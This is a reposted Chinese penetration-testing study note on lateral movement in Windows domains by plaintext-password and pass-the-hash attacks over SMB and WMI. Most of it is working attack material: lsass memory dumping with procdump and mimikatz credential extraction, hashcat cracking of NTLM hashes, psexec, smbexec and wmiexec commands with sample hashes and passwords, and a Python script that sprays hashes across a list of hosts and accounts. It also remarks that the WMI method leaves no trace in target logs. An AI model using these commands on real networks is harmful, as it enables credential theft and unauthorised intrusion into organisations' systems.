碼上快樂

相關內容    簡體    繁體

六十七:內網安全-域橫向smb&wmi明文或hash傳遞

本文轉載自   查看原文   2021-03-18 09:52   296    滲透測試體系化學習筆記


知識點1:

windows2012以上版本默認關閉wdigest,攻擊者無法從內存中獲取明文密碼
windows2012以下版本如安裝KB2871997補丁,同樣也會導致無法獲取明文密碼
針對以上情況,提供了4鍾方式解決此類問題
1.利用哈希hash傳遞(pth,ptk等)進行移動
2.利用其它服務協議(SMB,WMI等)進行哈希移動
3.利用注冊表操作開啟wdigest Auth值進行獲取
4.利用工具或第三方平台(Hachcat)進行破解獲取

知識點2

windows系統LM Hash 及NTLM Hash加密算法,個人系統在windows vista后,服務器系統在windows 2003以后,認證方式均為NTLM Hash

注冊表修改

修改wdigest  改為1

案例1-Procdump+Mimikatz配合獲取

procdump配合mimikatz

 procdump -accepteula -ma lsass.exe lsass.dmp
 mimikatz上執行:
 sekurlsa::minidump lsass.dmp
 sekurlsa::logonPasswords full

Pwdump7

QuarksPwdump

hashcat -a 0 -m 1000 hash file --force

案例2-域橫向移動SMB服務利用-psexec,smbexec(官方自帶)

利用SMB服務可以通過明文或hash傳遞來遠程執行,條件445服務端口開放。

psexec第一種:先有ipc鏈接,psexec需要明文或hash傳遞

net use \\192.168.3.32\ipc$ "admin!@#45" /user:ad
ministrator
psexec \\192.168.3.32 -s cmd # 需要先有ipc鏈接 -s以System權限運行

psexec第二種:不用建立IPC直接提供明文賬戶密碼

psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd 
psexec -hashes :$HASH$ ./administrator@10.1.2.3
psexec -hashes :$HASH$ domain/administrator@10.1.2.3
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 官方Pstools無法采用hash連接

非官方自帶-參考impacket工具包使用,操作簡單,容易被殺

smbexec無需先ipc鏈接 明文或hash傳遞

smbexec god/administrator:Admin12345@192.168.3.21
smbexec ./administrator:admin!@#45@192.168.3.32
smbexec -hashes :$HASH$ ./admin@192.168.3.21
smbbexec -hashes :$HASH$ domain/admin@192.168.3.21
smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
smbexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21

案例3-域橫向移動WMI服務利用-cscript,wmiexec,wmic

WMI(Windows Management Instrumentation) 是通過135端口進行利用,支持用戶名明文或者hash的方式進行認證,並且該方法不會在目標日志系統留下痕跡。

自帶WMIC 明文傳遞 無回顯

wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c  ipconfig >C:\1.txt"

自帶cscript明文傳遞 有回顯

cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

套件impacket wmiexec 明文或hash傳遞 有回顯exe版本

wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

案例4-域橫向移動以上服務hash批量利用-python編譯exe

pyinstaller.exe -F fuck_neiwang_002.py

import os,time
ips={
'192.168.3.21',
'192.168.3.25',
'192.168.3.29',
'192.168.3.30',
'192.168.3.32'
}
users={
'Administrator',
'boss',
'dbadmin',
'fileadmin',
'mack',
'mary',
'webadmin'
}
hashs={
'ccef208c6485269c20db2cad21734fe7',
'518b98ad4178a53695dc997aa02d455c'
}

for ip in ips:
for user in users:
for mimahash in hashs:
#wmiexec -hashes :hash god/user@ip whoami
exec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"
print('--->' + exec + '<---')
os.system(exec)
time.sleep(0.5)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 67:內網安全-域橫向smb&wmi明文或hash傳遞 內網安全3-域橫向smb&wmi明文或hash傳遞 內網滲透-橫向移動(smb&wmi) 六十八:內網安全-域橫向PTH&PTK&PTT哈希票據傳遞 內網滲透——PTH,SMB及WMI橫向移動 六十六:內網安全-域橫向批量at&schtasks%impacket 六十九:內網安全-域橫向CobalStrike&SPN&RDP 內網安全:域內橫向移動 68:內網安全-域橫向PTH&PTK&PTT哈希票據傳遞 SpringBoot進階教程(六十七)RateLimiter限流
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM